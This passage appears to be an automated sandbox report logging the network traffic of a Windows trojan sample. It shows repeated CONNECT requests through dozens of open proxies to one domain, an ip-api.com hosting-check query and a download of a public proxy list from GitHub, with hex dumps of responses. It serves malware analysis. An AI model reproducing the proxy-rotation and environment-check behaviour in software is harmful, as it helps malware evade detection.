                                                                                Feb 23, 2024 14:28:43.368743896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.456628084 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:43 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1929192.168.2.85532924.249.199.1241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.435970068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1930192.168.2.85558794.130.181.59327705828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.823587894 CET132INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                Data Ascii: Maximum number of open connections reached.
                                                                                Feb 23, 2024 14:28:46.061654091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1931192.168.2.855509106.14.255.124805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.908183098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1932192.168.2.854971185.54.0.1841535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.919361115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1933192.168.2.85554880.67.8.6805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.919362068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1934192.168.2.852749103.144.209.10436295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.919831991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1935192.168.2.85270277.235.19.280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.925813913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.925139904 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1936192.168.2.855555193.151.130.11480865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:44.237525940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1937192.168.2.855570175.183.82.22181975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:44.275012016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1938192.168.2.85553660.12.168.11490025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:44.282553911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.712846994 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 14:07:04 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1939192.168.2.85558491.197.77.1184435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:44.282660007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1940192.168.2.854980103.111.219.15441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:44.638966084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1941192.168.2.855572139.9.119.20805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:44.642672062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.950382948 CET638INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 519<html><head><meta http-equiv="Content-Type" content="textml;charset=GB2312" /><style>body{background-color:#FFFFFF}</style> <title>153</title><script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://114.115.192.246:9080/error.html"; }</script> </head><body><iframe style="width:100%; height:100%;" id="mainFrame" src="" frameborder="0" scrolling="no"/></body></html
                                                                                Data Raw:
                                                                                Data Ascii:


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1942192.168.2.855447171.248.222.6010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.035684109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1943192.168.2.85559474.119.144.6041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.049177885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1944192.168.2.852855113.11.183.14241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.057802916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1945192.168.2.855378142.54.232.641455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.074306011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1946192.168.2.855554103.148.57.103300095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.416677952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.084768057 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1947192.168.2.855490117.160.250.13088995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.416874886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1948192.168.2.855061181.15.154.154520335828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.428287983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1949192.168.2.855598104.17.248.164805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.428505898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.515856028 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:46 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1950192.168.2.855595177.12.118.160805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.428711891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1951192.168.2.855103162.214.102.195589945828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:46.449752092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.991827011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1952192.168.2.855941208.95.112.18022352C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:47.892729044 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                Host: ip-api.com
                                                                                Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.987286091 CET175INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:47 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Content-Length: 6
                                                                                Access-Control-Allow-Origin: *
                                                                                X-Ttl: 60
                                                                                X-Rl: 44
                                                                                Data Raw: 66 61 6c 73 65 0a
                                                                                Data Ascii: false


                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.849709140.82.113.44435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-02-23 13:28:21 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                Host: github.com
                                                                                Connection: Keep-Alive
                                                                                2024-02-23 13:28:21 UTC506INHTTP/1.1 200 OK
                                                                                Server: GitHub.com
                                                                                Date: Fri, 23 Feb 2024 13:28:21 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                ETag: W/"396e43d5701e4c003deab807c3af9595"
                                                                                Cache-Control: max-age=0, private, must-revalidate
                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                X-Frame-Options: deny
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 0
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                2024-02-23 13:28:21 UTC3587INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                2024-02-23 13:28:21 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                Data Ascii: connection: close
                                                                                2024-02-23 13:28:21 UTC1370INData Raw: 34 35 45 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                Data Ascii: 45E0<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                2024-02-23 13:28:21 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                2024-02-23 13:28:21 UTC1370INData Raw: 67 69 74 68 75 62 2d 38 65 61 61 62 32 32 38 34 34 38 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                Data Ascii: github-8eaab228448a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                2024-02-23 13:28:21 UTC1370INData Raw: 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c
                                                                                Data Ascii: -parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_hydro-anal
                                                                                2024-02-23 13:28:21 UTC1370INData Raw: 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 2d 32 39 64 63 33 30 2d 61 32 61 37 31 66 31 31 61 35 30 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a
                                                                                Data Ascii: ation/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-29dc30-a2a71f11a507.js"></script><script crossorigin="anonymous" defer="defer" type="application/j
                                                                                2024-02-23 13:28:21 UTC1370INData Raw: 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 2d 39 37 38 61 62 63 30 2d 61 64 64 39 33 39 63 37 35 31 63 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6c 69 74 2d 68 74 6d 6c 5f 6c 69
                                                                                Data Ascii: b_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0-add939c751ce.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_li
